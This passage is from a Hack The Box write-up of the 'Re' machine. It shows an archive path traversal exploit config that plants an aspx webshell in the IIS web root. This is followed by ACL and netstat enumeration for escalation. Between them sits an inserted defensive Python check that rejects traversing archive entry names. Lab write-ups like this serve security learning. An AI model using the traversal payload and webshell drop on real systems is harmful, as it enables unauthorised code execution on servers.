HTB Re: Full Penetration Walkthrough
Source: 岁月联盟
Date: 2020-03-16
d----- 6/18/2019 10:18 PM re
C:\inetpub\wwwroot\blog
Access is denied.
Grab an aspx webshell from the internet and tweak the exp that generates the rar:
# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "kira.aspx"
# The decompression path you want, as shown below
target_filename = r"C:\C:C:../../../../../../../inetpub/wwwroot/blog/kira.aspx"
Successfully obtained a webshell!
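The exploit config above works because the extractor trusts an entry name that carries a drive prefix and `..` components. As an added example (not code from the original writeup or from the exploit), here is the defender-side check an extraction routine should run on every entry name before writing to disk; the sample entries and the extraction root `C:\extract` are constructed for the demonstration.

```python
import ntpath
import re

# Constructed sample entry names. The first mirrors the traversal shape from the
# exploit config above; the others are benign or edge cases.
SAMPLE_ENTRIES = [
    r"C:\C:C:../../../../../../../inetpub/wwwroot/blog/kira.aspx",  # drive prefix + traversal
    r"docs/readme.txt",                                              # benign relative path
    r"..\..\Windows\System32\drivers\etc\hosts",                     # plain traversal
    r"\\server\share\payload.exe",                                   # UNC / rooted path
    r"reports/2019/../summary.csv",                                  # '..' that stays inside root
]

_DRIVE_RE = re.compile(r"^[A-Za-z]:")


def is_unsafe_entry(name: str) -> bool:
    """True when an archive entry name must not be extracted as-is.

    Flags rooted paths (leading backslash or UNC), any drive-letter prefix
    (including repeated ones such as 'C:\\C:C:'), and any path that climbs
    above the extraction root at some point in its component sequence.
    """
    n = name.replace("/", "\\")
    if n.startswith("\\") or _DRIVE_RE.match(n):
        return True
    depth = 0
    for part in (p for p in n.split("\\") if p not in ("", ".")):
        if part == "..":
            depth -= 1
            if depth < 0:          # escaped the root
                return True
        else:
            depth += 1
    return False


def resolve_destination(root: str, name: str) -> str:
    """Join an entry under root and re-verify the normalised result stays inside root."""
    if is_unsafe_entry(name):
        raise ValueError(f"refusing to extract {name!r}")
    dest = ntpath.normpath(ntpath.join(root, name.replace("/", "\\")))
    if ntpath.commonpath([ntpath.normpath(root), dest]) != ntpath.normpath(root):
        raise ValueError(f"{name!r} resolves outside {root!r}")
    return dest


def plan_extraction(root: str, names) -> dict:
    """Map each entry to its destination path, or to None when it is refused."""
    plan = {}
    for n in names:
        try:
            plan[n] = resolve_destination(root, n)
        except ValueError:
            plan[n] = None
    return plan
```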
Writing the webshell into the ip and re directories as well, I found that they run under different user permissions than blog; in particular, IIS APPPOOL\re can open the root-level directory proj_drop.
PS C:\> get-acl proj_drop|format-list
Path : Microsoft.PowerShell.Core\FileSystem::C:\proj_drop
Owner : BUILTIN\Administrators
Group : RE\None
Access : CREATOR OWNER Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
RE\coby Allow Modify, Synchronize
RE\cam Allow FullControl
IIS APPPOOL\re Allow ReadAndExecute, Synchronize
IIS APPPOOL\re Allow Write, Synchronize
The proj_drop directory looks suspicious: files placed in it also disappear. This may continue the earlier pattern, where dropping a suitable file into it triggers a specific vulnerability. Let me re-read the box's blog to see whether it gives a hint.
A quick look shows that the author himself never managed to exploit the vulnerability, and port 18001 is not open in the environment (the author is suspected of using the box to collect exploits [shocked]), so another approach is needed.
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 816
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 448
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 960
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 312
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1656
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 584
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 596